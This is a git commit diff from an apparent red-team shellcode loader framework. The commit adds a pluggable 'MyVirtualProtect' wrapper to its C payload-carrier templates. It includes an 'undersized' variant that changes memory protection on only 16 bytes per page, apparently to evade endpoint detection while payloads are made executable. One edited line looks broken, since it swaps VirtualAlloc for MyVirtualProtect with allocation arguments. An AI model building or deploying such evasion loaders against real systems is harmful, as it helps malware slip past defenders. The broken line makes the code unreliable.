admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-02 17:27:10 +00:00
Code Issues Packages Projects Releases Wiki Activity

feature: MyVirtualProtect

Browse Source
This commit is contained in:
Dobin Rutishauser
2024-06-24 16:58:44 +02:00
parent 31be61ee8e
commit b6db721c12
12 changed files with 68 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files
app/templates/project.html
+17
View File
@@ -286,6 +286,23 @@
</select>
</div>
</div>
<div class="form-group row">
<label for="virtualprotect_style" class="col-sm-5 col-form-label">
VirtualProtect
</label>
<div class="col-sm-7">
<select class="form-select" name="virtualprotect" id="virtualprotect"
aria-label="virtualprotect" onchange="this.form.submit()">
{% for name in virtualprotectstyles %}
<option value="{{name}}"
{% if name in project.settings.plugin_virtualprotect %} selected {% endif %}
>{{name}}
</option>
{% endfor %}
</select>
</div>
</div>
</div>
</div>
app/views_project.py
+3
View File
@@ -105,6 +105,7 @@ def project(name):
guardrail_styles = list_files(PATH_GUARDRAILS)
antiemulation_styles = list_files(PATH_ANTIEMULATION)
decoy_styles = list_files(PATH_DECOY)
virtualprotect_styles = list_files(PATH_VIRTUALPROTECT)
return render_template('project.html',
project_name = name,
@@ -136,6 +137,7 @@ def project(name):
guardrailstyles = guardrail_styles,
antiemulationstyles = antiemulation_styles,
decoystyles = decoy_styles,
virtualprotectstyles = virtualprotect_styles
)
@@ -216,6 +218,7 @@ def add_project():
settings.payload_location = PayloadLocation[payload_location]
settings.plugin_guardrail_data = request.form.get('guardrail_data', '')
settings.plugin_virtualprotect = request.form.get('virtualprotect')
# overwrite project
project = storage.get_project(project_name)
data/source/carrier/alloc_rw_rx/template.c
+2 -1
View File
@@ -15,6 +15,7 @@ char *supermega_payload;
{{plugin_executionguardrail}}
{{plugin_virtualprotect}}
/* VirtualAlloc -> rw -> rx
@@ -49,7 +50,7 @@ int main()
// to: dest[]
{{ plugin_decoder }}
if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
return 7;
}
data/source/carrier/change_rw_rx/template.c
+2 -2
View File
@@ -39,13 +39,13 @@ int main()
// Call: Decoy plugin
decoy();
if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RW, &result) == 0) {
if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RW, &result) == 0) {
return 16;
}
{{ plugin_decoder }}
if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
if (MyVirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) {
return 16;
}
data/source/carrier/dll_loader_alloc/template.c
+1 -1
View File
@@ -166,7 +166,7 @@ int main()
// Call: Decoy plugin
decoy();
dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
dest = MyVirtualProtect(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE);
// FROM supermega_payload[]
// TO dest[]
data/source/carrier/dll_loader_change/template.c
+1 -1
View File
@@ -201,7 +201,7 @@ int main()
// Call: Decoy plugin
decoy();
VirtualProtect((LPVOID)dest, {{PAYLOAD_LEN}}, PAGE_EXECUTE_READWRITE, &oldProtect);
MyVirtualProtect((LPVOID)dest, {{PAYLOAD_LEN}}, PAGE_EXECUTE_READWRITE, &oldProtect);
// FROM supermega_payload[]
// TO dest[]
data/source/carrier/peb_walk/template.c
+1 -1
View File
@@ -5,7 +5,7 @@
char *supermega_payload;
/* peb_walk
Standard shellcode which will resolve IAT by itself with a peb walk
Test shellcode which will resolve IAT by itself with a peb walk
no IAT reuse is performed
no data reuse is performed
*/
data/source/virtualprotect/standard.c
+9
View File
@@ -0,0 +1,9 @@
BOOL MyVirtualProtect(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldprotect
) {
return VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldprotect);
}
data/source/virtualprotect/undersized.c
+19
View File
@@ -0,0 +1,19 @@
// How many bytes we VirtualProtect
#define VP_SIZE 16
BOOL MyVirtualProtect(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldprotect
) {
char *dest = (char *)lpAddress;
for(int n=0; n<(dwSize/4096)+1; n++) {
if (VirtualProtect(dest + (n * 4096), VP_SIZE, flNewProtect, lpflOldprotect) == 0) {
return FALSE;
}
}
return TRUE;
}
model/defs.py
+1
View File
@@ -18,6 +18,7 @@ PATH_DECODER = "data/source/decoder/"
PATH_ANTIEMULATION = "data/source/antiemulation/"
PATH_DECOY = "data/source/decoy/"
PATH_GUARDRAILS = "data/source/guardrails/"
PATH_VIRTUALPROTECT = "data/source/virtualprotect/"
PATH_WEB_PROJECT = "projects/"
model/settings.py
+2
View File
@@ -18,6 +18,8 @@ class Settings():
self.plugin_decoy = "none"
self.plugin_guardrail = "none"
self.plugin_guardrail_data = "C:\\Users\\"
self.plugin_virtualprotect = "standard"
self.plugin_virtualprotect_data = ""
self.dllfunc: str = "" # For DLL injection
phases/templater.py
+10
View File
@@ -27,6 +27,15 @@ def create_c_from_template(settings: Settings, payload_len: int):
PATH_DECODER, settings.main_c_path))
plugin_decoder = ""
# Plugin: VirtualAlloc
filepath_virtualprotect = PATH_VIRTUALPROTECT + "{}.c".format(
settings.plugin_virtualprotect)
with open(filepath_virtualprotect, "r", encoding='utf-8') as file:
plugin_virtualprotect = file.read()
plugin_virtualprotect = Template(plugin_virtualprotect).render({
'virtualprotect_data': settings.plugin_virtualprotect_data,
})
# Plugin: Execution Guardrails
filepath_guardrails = PATH_GUARDRAILS + "{}.c".format(
settings.plugin_guardrail)
@@ -75,6 +84,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
'plugin_decoy': plugin_decoy,
'plugin_executionguardrail': plugin_guardrails,
'PAYLOAD_LEN': payload_len,
'plugin_virtualprotect': plugin_virtualprotect,
})
with open(settings.main_c_path, "w", encoding='utf-8') as file:
file.write(rendered_template)